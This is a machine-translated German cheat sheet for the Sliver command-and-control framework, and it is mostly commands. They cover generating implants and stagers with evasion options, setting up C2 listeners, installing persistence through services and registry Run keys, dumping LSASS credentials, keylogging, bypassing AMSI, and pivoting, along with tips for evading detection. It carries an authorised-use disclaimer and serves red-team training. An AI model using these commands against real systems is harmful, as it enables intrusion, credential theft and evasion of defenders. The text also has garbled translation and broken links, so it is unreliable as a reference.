Sliver C2 Framework Cheat Sheet
Überblick
Sliver ist ein moderner, offener plattformübergreifender adversärer Emulations-/roter Teamrahmen, der als Alternative zu Cobalt Strike konzipiert ist. Es bietet erweiterte Befehls- und Kontrollfunktionen mit Unterstützung für mehrere Plattformen, evasive Kommunikationen und Team-basierte Operationen.
ZEIT Warnung: Dieses Tool ist nur für autorisierte Penetrationstests und rote Teamübungen gedacht. Stellen Sie sicher, dass Sie eine ordnungsgemäße Genehmigung vor der Verwendung in jeder Umgebung haben.
Installation
Vorkompilierte Binäre (empfohlen)
```bash
Download latest release for Linux
curl -L https://github.com/BishopFox/sliver/releases/latest/download/sliver-server_linux -o sliver-server chmod +x sliver-server
Download latest release for macOS
curl -L https://github.com/BishopFox/sliver/releases/latest/download/sliver-server_macos -o sliver-server chmod +x sliver-server
Download latest release for Windows
Download sliver-server_windows.exe from GitHub releases
```_
Aufbau von Source
```bash
Install Go (version 1.19+)
git clone https://github.com/BishopFox/sliver.git cd sliver make ```_
Docker Installation
```bash
Pull official Docker image
docker pull bishopfox/sliver
Run Sliver server in Docker
docker run -it -p 31337:31337 -p 8080:8080 bishopfox/sliver ```_
Basisnutzung
Sliver Server starten
```bash
Start the server (first run will generate certificates)
./sliver-server
Start server with custom configuration
./sliver-server -c /path/to/config.json
Start server in daemon mode
./sliver-server daemon ```_
Client-Verbindung
```bash
Connect to local server
./sliver-client
Connect to remote server
./sliver-client -c /path/to/client.cfg
Generate new client configuration
./sliver-server operator --name username --lhost server-ip ```_
Befehlsnummer
Serververwaltung
| | Command | Description | |
| --- | --- |
| | help
| Display help information | |
| | version
| Show version information | |
| | operators
| List connected operators | |
| | kick-operator <name>
| Disconnect an operator | |
| | armory
| Access the Sliver armory (extensions) | |
Hörer Management
| | Command | Description | |
| --- | --- |
| | mtls
| Start mTLS listener | |
| | wg
| Start WireGuard listener | |
| | http
| Start HTTP listener | |
| | https
| Start HTTPS listener | |
| | dns
| Start DNS listener | |
| | jobs
| List active listeners | |
| | jobs -k <id>
| Kill a listener | |
Implantate Generation
| | Command | Description | |
| --- | --- |
| | generate
| Generate implant | |
| | generate --mtls <host:port>
| Generate mTLS implant | |
| | generate --http <url>
| Generate HTTP implant | |
| | generate --dns <domain>
| Generate DNS implant | |
| | profiles
| List implant profiles | |
| | profiles new <name>
| Create new profile | |
Sitzungsmanagement
| | Command | Description | |
| --- | --- |
| | sessions
| List active sessions | |
| | use <session-id>
| Interact with session | |
| | background
| Background current session | |
| | sessions -k <id>
| Kill a session | |
| | sessions -K
| Kill all sessions | |
Hörer Setup
mTLS Hörer (Empfohlen)
```bash
Start mTLS listener on default port (8888)
mtls
Start mTLS listener on custom port
mtls -l 443
Start mTLS listener with custom interface
mtls -l 0.0.0.0:8888 ```_
HTTP/HTTPS Hörer
```bash
Start HTTP listener
http -l 80
Start HTTPS listener with custom certificate
https -l 443 -c /path/to/cert.pem -k /path/to/key.pem
Start HTTP listener with custom domain
http -l 80 -d example.com ```_
DNS Listener
```bash
Start DNS listener
dns -d example.com
Start DNS listener with custom nameserver
dns -d example.com -l 53 ```_
WireGuard Hörer
```bash
Start WireGuard listener
wg -l 53
Start WireGuard listener with custom key port
wg -l 53 -x 1234 ```_
Implantate Generation
Implantate Generation
```bash
Generate Windows executable
generate --mtls 192.168.1.100:8888 --os windows --arch amd64 --format exe
Generate Linux ELF binary
generate --mtls 192.168.1.100:8888 --os linux --arch amd64 --format elf
Generate macOS binary
generate --mtls 192.168.1.100:8888 --os darwin --arch amd64 --format macho ```_
Erweiterte Implantatoptionen
```bash
Generate with custom name and save location
generate --mtls 192.168.1.100:8888 --os windows --save /tmp/implant.exe --name MyImplant
Generate with evasion features
generate --mtls 192.168.1.100:8888 --os windows --evasion --skip-symbols
Generate shellcode
generate --mtls 192.168.1.100:8888 --os windows --format shellcode
Generate shared library
generate --mtls 192.168.1.100:8888 --os linux --format shared ```_
Geplante Payloads
```bash
Generate staged payload
generate --mtls 192.168.1.100:8888 --os windows --format exe --strategy staged
Generate stager
generate stager --mtls 192.168.1.100:8888 --os windows --arch amd64 --format exe ```_
Sitzungs-Interaktion
Grundlegende Sitzungsbefehle
```bash
Get system information
info
Get current user
whoami
Get current working directory
pwd
List files and directories
ls
Change directory
cd /path/to/directory
Download file
download /remote/path/file.txt
Upload file
upload /local/path/file.txt /remote/path/ ```_
Prozessmanagement
```bash
List processes
ps
Get current process info
getpid
Migrate to another process
migrate
Execute command
execute
Start interactive shell
shell
Terminate process
terminate
Netzwerkaktivitäten
```bash
Get network interfaces
ifconfig
Get network connections
netstat
Port forward
portfwd add --bind 127.0.0.1:8080 --remote 192.168.1.10:80
List port forwards
portfwd
Remove port forward
portfwd rm --id
SOCKS proxy
socks5 start
Stop SOCKS proxy
socks5 stop ```_
Vorrechte Eskalation
```bash
Get current privileges
getprivs
Attempt privilege escalation
getsystem
Run as different user
runas -u username -p password
Impersonate token
impersonate
Revert to self
rev2self ```_
Persistenz
```bash
Install service persistence
persistence service --name ServiceName --path /path/to/implant.exe
Install registry persistence
persistence registry --hive HKCU --path "Software\Microsoft\Windows\CurrentVersion\Run" --key "MyApp"
Remove persistence
persistence remove --id
Erweiterte Funktionen
Pivozieren und Lateralbewegung
```bash
Generate pivot listener
pivots tcp --bind 0.0.0.0:9999
Connect through pivot
generate --mtls pivot-host:9999 --os windows
List active pivots
pivots
Stop pivot
pivots --id
Credential Harvesting
```bash
Dump process memory
procdump -p
Dump LSASS
procdump -n lsass.exe -s /tmp/lsass.dmp
Screenshot
screenshot
Keylogger
keylogger start keylogger dump keylogger stop ```_
Evasion Techniken
```bash
Process hollowing
execute-assembly --process notepad.exe /path/to/assembly.exe
In-memory .NET assembly execution
execute-assembly /path/to/assembly.exe
PowerShell execution
powershell -c "Get-Process"
Bypass AMSI
armory install bypass-amsi ```_
Profile und Vorlagen
Profil erstellen
```bash
Create new implant profile
profiles new windows-profile --mtls 192.168.1.100:8888 --os windows --arch amd64
Generate from profile
generate --profile windows-profile
List profiles
profiles
Delete profile
profiles rm windows-profile ```_
C2 Profil Anpassung
```bash
HTTP C2 profile with custom headers
http --lhost 0.0.0.0 --lport 80 --website /path/to/website
HTTPS with custom certificate
https --cert /path/to/cert.pem --key /path/to/key.pem --lhost 0.0.0.0 --lport 443 ```_
Armory Extensions
Installation von Erweiterungen
```bash
Update armory
armory update
Install extension
armory install
List available extensions
armory
List installed extensions
armory installed ```_
Beliebte Erweiterungen
```bash
Process injection techniques
armory install process-injection
Credential dumping
armory install credman
Registry operations
armory install registry
WMI operations
armory install wmi ```_
Team Operations
Multi-Operator Setup
```bash
Generate operator config
./sliver-server operator --name operator1 --lhost server-ip --save operator1.cfg
Connect as operator
./sliver-client -c operator1.cfg
List connected operators
operators
Send message to operators
msg "Hello team!" ```_
Sitzungsaustausch
```bash
Share session with team
sessions -i
Take control of shared session
use
Fehlerbehebung
Gemeinsame Themen
Verbindungsprobleme
```bash
Check listener status
jobs
Restart listener
jobs -k
Check firewall rules
Ensure ports are open on server
```_
Implantat-Detektion
```bash
Use evasion options
generate --mtls 192.168.1.100:8888 --os windows --evasion --skip-symbols --debug
Try different communication protocols
generate --dns example.com --os windows
Use staged payloads
generate stager --mtls 192.168.1.100:8888 --os windows ```_
Leistungsfragen
```bash
Adjust beacon interval
use
Use compression
reconfig --compress ```_
Debugging
```bash
Enable debug mode
./sliver-server --debug
Check logs
tail -f ~/.sliver/logs/sliver.log
Verbose client output
./sliver-client --debug ```_
Sicherheitsüberlegungen
Operationelle Sicherheit
- Verschlüsselte Kommunikation verwenden (mTLS empfohlen)
- Regelmäßig rotieren Zertifikate und Schlüssel
- Umsetzung der richtigen Zugangskontrollen für Betreiber
- Alle Aktivitäten überwachen und protokollieren
- Verwenden Sie Staging-Server, um direkte Zuschreibung zu vermeiden
Evasion Best Practices
- Vary Beacon Intervalle und Jitter
- Verwenden Sie legitim aussehende Domains und Zertifikate
- Implementieren Sie Domain Fronting wo möglich
- Verwenden Sie mehrere Kommunikationskanäle
- Regelmäßig aktualisieren Implantate und Techniken
Ressourcen
- Official Sliver Dokumentation
- [Sliver GitHub Repository](LINK_5 -%20Bishop%20Fox%20Blog
- [Sliver Community Wiki](_LINK_5___
- [Red Team Village Sliver Training](__LINK_5___
--
*Dieses Betrügereiblatt bietet eine umfassende Referenz für die Verwendung von Sliver C2 Framework. Stellen Sie immer sicher, dass Sie eine richtige Berechtigung haben, bevor Sie dieses Tool in jeder Umgebung verwenden. *